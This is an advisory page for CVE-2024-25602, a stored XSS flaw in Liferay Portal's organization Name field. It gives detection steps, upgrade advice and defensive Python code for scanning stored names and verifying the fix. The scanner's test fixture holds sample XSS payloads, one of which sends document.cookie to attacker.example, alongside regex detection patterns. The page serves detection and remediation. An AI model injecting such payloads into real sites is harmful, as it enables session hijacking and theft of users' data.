Platform
java
Component
users-admin-module
Fixed in
7.4.3
7.3.11
7.2.11
CVE-2024-25602 is a stored cross-site scripting (XSS) vulnerability in the Users Admin module of Liferay Portal. A remote, authenticated user can inject arbitrary web script or HTML that the portal stores and later renders to other users. Affected are Liferay Portal 7.2.0 through 7.4.2 and older unsupported versions, as well as Liferay DXP 7.3 before service pack 3 and Liferay DXP 7.2 before fix pack 17. Liferay Portal 7.4.3 contains the fix.
Successful exploitation lets an attacker plant JavaScript in the portal that runs in the browser of every other user who views the affected page, which can lead to session or account takeover, data theft, or defacement. The injection point is the organization 'Name' field shown on a user's profile: the attacker saves the payload there once, and it fires each time another authenticated user views that profile. The blast radius is therefore every authenticated user who can see the profile, not only the attacker's own session. The root cause is the usual one for stored XSS: user-supplied data is written into the page without HTML output encoding.
CVE-2024-25602 was publicly disclosed on February 21, 2024. No active exploitation has been publicly confirmed, and the EPSS score listed on this page (0.15%, 36th percentile) predicts a low likelihood of exploitation. This page lists no CVSS vector, and stored XSS that requires an authenticated account is normally scored in the medium range, not critical. The CVE does not appear in the CISA KEV catalog, so it should not be described as a KEV entry. What makes it worth fixing promptly is how little the attack requires: any authenticated user who can set an organization name can plant the payload once, and it then executes for every other user who views the profile. Public proof-of-concept code for stored XSS of this kind is trivial to write, so do not let the low EPSS figure delay the upgrade on instances with self-registration or broadly granted organization-management rights.
Organizations that rely on Liferay Portal for user management and internal applications are exposed. Deployments on older, unsupported versions of Liferay Portal or DXP are in the worst position, because they no longer receive security updates at all. Multi-tenant setups in which several organizations share one Liferay instance carry extra risk as well: a single compromised or malicious low-privilege account can store a payload that is then served to users of other tenants who view the profile.
• linux / server: Liferay does not log a rejected or stored payload as "XSS injection", so the original journal grep for that string finds nothing on a real system. The authoritative check is the stored data: the organization name lives in the name column of the Organization_ table, so review it for values containing <, onerror= or javascript:. If you want the journal at all, scope it to the Liferay service (unit name assumed to be liferay) and the window in which the suspect profile or organization was edited:
journalctl -u liferay --since "-24h"
• generic web: a response-header check only tells you whether a browser-side defence layer exists; it says nothing about whether the instance is patched. The URL path in the original command is not a real Liferay route, so check the portal root instead:
curl -sI 'https://<liferay_portal_url>/' | grep -i 'content-security-policy'
A missing header means a stored payload runs without a CSP backstop; a present header is not a substitute for the upgrade.
• wordpress / composer / npm: not applicable (Liferay is not distributed through these ecosystems).
• database (mysql, postgresql): applicable, contrary to what the original text claims. The payload is stored, and the database is the one place it can be read back in full, so query Organization_.name directly. redis / mongodb: not applicable (Liferay does not keep organization data there).
• windows / supply-chain: no OS-specific check exists. Liferay runs on Windows as well, so the test is the same on every platform: compare the installed Liferay Portal or DXP version against the fixed versions listed above.
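The database check described above, as an added example that is not Liferay's own code: it queries the Organization_ table for names containing markup and reports the matching rows. The three columns used are a subset of the real schema (an assumption made for triage), and the SQLite fixture is constructed sample data so the scan runs offline; hand scan_organization_names() any DB-API connection to MySQL or PostgreSQL to run it against a real portal database.

```python
"""Scan stored Liferay organization names for markup that should never be there.

Added example for this page, not Liferay code. Liferay keeps organizations in the
Organization_ table; the three columns used here are a subset of the real schema
(assumption: only organizationId, companyId and name are needed for triage). The
SQLite fixture is constructed sample data so the scan runs offline.
"""
import re
import sqlite3

# Indicators a plain organization name has no business containing. A name such as
# "Smith & Sons" is legitimate, so only markup-like content is flagged; hits are
# leads for a human to review, not automatic verdicts.
SUSPICIOUS_PATTERNS = {
    "html_tag": re.compile(r"<\s*/?\s*[a-z][^>]*>", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
    "data_html_uri": re.compile(r"data\s*:\s*text/html", re.I),
}

# The same statement works unchanged on MySQL and PostgreSQL.
QUERY = "SELECT organizationId, companyId, name FROM Organization_"


def classify_name(name):
    """Return the indicator labels that match `name` (empty list when clean)."""
    text = name or ""
    return [label for label, pattern in SUSPICIOUS_PATTERNS.items() if pattern.search(text)]


def scan_organization_names(conn):
    """Run QUERY on a DB-API connection and return the suspicious rows."""
    findings = []
    cur = conn.cursor()
    cur.execute(QUERY)
    for org_id, company_id, name in cur.fetchall():
        indicators = classify_name(name)
        if indicators:
            findings.append({
                "organizationId": org_id,
                "companyId": company_id,
                "name": name,
                "indicators": indicators,
            })
    return findings


def build_fixture():
    """Constructed in-memory stand-in for Organization_ (sample rows, not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Organization_ (organizationId INTEGER, companyId INTEGER, name TEXT)"
    )
    rows = [
        (20101, 20097, "Acme Holdings"),
        (20102, 20097, "Smith & Sons"),
        (20103, 20097, "<img src=x onerror=alert(document.cookie)>"),
        (20104, 20097, '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'),
        (20105, 20097, 'Partners <a href="javascript:alert(1)">portal</a>'),
        (20106, 20097, None),
    ]
    conn.executemany("INSERT INTO Organization_ VALUES (?, ?, ?)", rows)
    conn.commit()
    return conn


if __name__ == "__main__":
    for finding in scan_organization_names(build_fixture()):
        print(f"organizationId={finding['organizationId']} "
              f"indicators={','.join(finding['indicators'])} name={finding['name']!r}")
```

Run it against the fixture and three of the six rows are reported; on a real database, every hit is a row to clean up by hand after the upgrade, because patching the view does not remove payloads that are already stored.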
disclosure
patch
Exploit status
EPSS
0.15% (36th percentile)
CISA SSVC
CVSS vector
The primary mitigation for CVE-2024-25602 is to upgrade Liferay Portal to version 7.4.3 or later (Liferay DXP 7.3 to service pack 3 or later, DXP 7.2 to fix pack 17 or later). If an immediate upgrade is not feasible, temporary workarounds reduce but do not remove the exposure. HTML output encoding of the organization 'Name' field wherever it is rendered is the real fix; input validation on its own is not, because it is easily bypassed and does nothing for payloads that are already stored. A web application firewall with rules for XSS payloads aimed at the Users Admin module adds a layer, as does a Content-Security-Policy header, but neither is a substitute for the patch. Liferay does not log the contents of profile fields, so rather than watching the logs, review the stored organization names in the database for markup. After upgrading, confirm the fix on a test instance by saving a benign marker payload in the 'Name' field and checking that the rendered profile page contains it only in HTML-encoded form; then clean up any payloads the scan of stored names turned up, because the upgrade neutralises their rendering but leaves the data in place.
Upgrade Liferay Portal to a version later than 7.4.2, or Liferay DXP 7.3 to service pack 3 or later, or Liferay DXP 7.2 to fix pack 17 or later. This fixes the stored XSS vulnerability in the Users Admin module.
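The vulnerable-versus-hardened rendering behind the description above, together with the post-upgrade verification step, as an added example that is neither Liferay's code nor its fix: render_vulnerable() imitates a view that prints the organization name unencoded, render_fixed() is the same view with HTML output encoding (Python's html.escape stands in for the encoder a Java view would use), and verify_fix() classifies the HTML you fetched for a profile whose organization name was set to the marker on a test instance. PROFILE_TEMPLATE and MARKER are assumptions made for the example.

```python
"""Why the Users Admin XSS works and how to check that an upgrade closed it.

Added example for this page, not Liferay code. PROFILE_TEMPLATE and MARKER are
assumptions made for the example; feed verify_fix() the real page HTML from a
test instance to use it for the post-upgrade check.
"""
import html
import re

# Benign marker: unmistakable in HTML, harmless if it does execute. Use a test instance.
MARKER = '<img src=x onerror="console.log(\'cve-2024-25602-check\')">'

# Minimal stand-in for the profile markup that shows a user's organization.
PROFILE_TEMPLATE = '<div class="organization"><span class="name">{name}</span></div>'

# The marker's own tag, used to spot a payload that was altered but not defused.
MARKER_TAG = re.compile(r"<\s*img\b", re.I)


def render_vulnerable(org_name):
    """Vulnerable pattern: untrusted data interpolated into HTML with no encoding."""
    return PROFILE_TEMPLATE.format(name=org_name)


def render_fixed(org_name):
    """Hardened pattern: encode at output time. quote=True also encodes ' and ",
    so the same call is safe inside attribute values, not only in text content."""
    return PROFILE_TEMPLATE.format(name=html.escape(org_name, quote=True))


def verify_fix(rendered_html, payload=MARKER):
    """Classify a fetched profile page. Returns (neutralised, detail)."""
    if payload in rendered_html:
        return False, "payload reflected unencoded"
    if MARKER_TAG.search(rendered_html):
        return False, "marker tag survived in altered form"
    if html.escape(payload, quote=True) in rendered_html:
        return True, "payload present only in HTML-encoded form"
    return True, "payload absent (stripped or rejected); confirm the name was actually saved"


if __name__ == "__main__":
    for label, page in (("vulnerable", render_vulnerable(MARKER)),
                        ("fixed", render_fixed(MARKER))):
        print(f"{label}: {verify_fix(page)}\n  {page}")
```

The second check in verify_fix() matters in practice: a filter that strips quotes or rewrites attributes can leave the img tag intact, which still executes, so the function treats any surviving unencoded marker tag as a failed fix rather than trusting the absence of the exact original string.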
CVE-2024-25602 is a stored cross-site scripting (XSS) vulnerability in Liferay Portal's Users Admin module, allowing attackers to inject malicious scripts.
You are affected if you are running Liferay Portal versions 7.2.0–7.4.2, or older unsupported versions, and Liferay DXP versions prior to service pack 3 for 7.3 and prior to fix pack 17 for 7.2.
Upgrade to Liferay Portal 7.4.3 or later to remediate the vulnerability. Consider temporary workarounds like input validation and WAF rules if immediate upgrading is not possible.
No active exploitation campaigns have been publicly confirmed and the EPSS score is low (0.15%); the practical risk comes from how little the attack requires: one authenticated account and a single profile edit.
Refer to the official Liferay security advisory for detailed information and mitigation steps: [https://liferay.com/security-advisories/liferay-portal-and-dxp-security-vulnerability-xss-in-users-admin-module](https://liferay.com/security-advisories/liferay-portal-and-dxp-security-vulnerability-xss-in-users-admin-module)